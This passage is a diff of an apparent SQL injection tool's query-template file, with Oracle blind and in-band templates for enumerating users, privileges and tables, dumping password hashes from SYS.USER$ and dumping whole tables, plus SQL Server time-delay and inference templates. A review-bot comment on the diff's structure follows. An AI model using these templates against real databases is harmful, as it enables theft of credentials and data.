<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
|
||||
</users>
|
||||
<passwords>
|
||||
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
|
||||
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
|
||||
</passwords>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the privileges for the session user you can use:
|
||||
SELECT * FROM SESSION_PRIVS
|
||||
-->
|
||||
<privileges>
|
||||
<inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
|
||||
</privileges>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the roles for the session user you can use:
|
||||
SELECT * FROM SESSION_ROLES
|
||||
-->
|
||||
<roles>
|
||||
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
|
||||
</roles>
|
||||
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
|
||||
<dbs/>
|
||||
<tables>
|
||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
|
||||
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db/>
|
||||
<search_table>
|
||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||
<blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||
</search_table>
|
||||
<search_column>
|
||||
<inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
|
||||
<blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<!-- SQLite -->
|
||||
<dbms value="SQLite">
|
||||
<!-- Not supported on SQLite 2 -->
|
||||
@@ -477,7 +473,6 @@
|
||||
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
||||
<substring query="SUBSTRING((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
|
||||
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT @@VERSION"/>
|
||||
<current_user query="SELECT SUSER_NAME()"/>
|
||||
|
||||
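Review bot: Relocating the whole Oracle `<dbms>` block from after MySQL (old lines 74-157, the `@@ -74,84 +73,6 @@` hunk) to after Microsoft SQL Server (the `@@ -290,6 +209,83 @@` hunk) turns what is otherwise a one-line change per block — dropping the `<error>` template, as the `@@ -24`, `@@ -175`, `@@ -242` and `@@ -477` hunks do for the other dbms entries — into an 84-line delete plus an 83-line re-add that hides the real edit in review and in blame. Keeping the `<dbms>` blocks in their previous order, or moving Oracle in a separate commit, would leave this file's diff at five deleted `<error>` lines as far as the shown hunks go. With `<error>` gone from every block here, any code that still looks up that element in queries.xml will presumably fail at lookup time; the commit message says the templates now live in payloads.xml as `<epayload>`, so it is worth confirming no reader of the old `error` query remains. A short comment near the top of the dbms list, e.g. `<!-- error-based templates are defined per test in payloads.xml (<epayload>), not here -->`, would explain the asymmetry to the next maintainer.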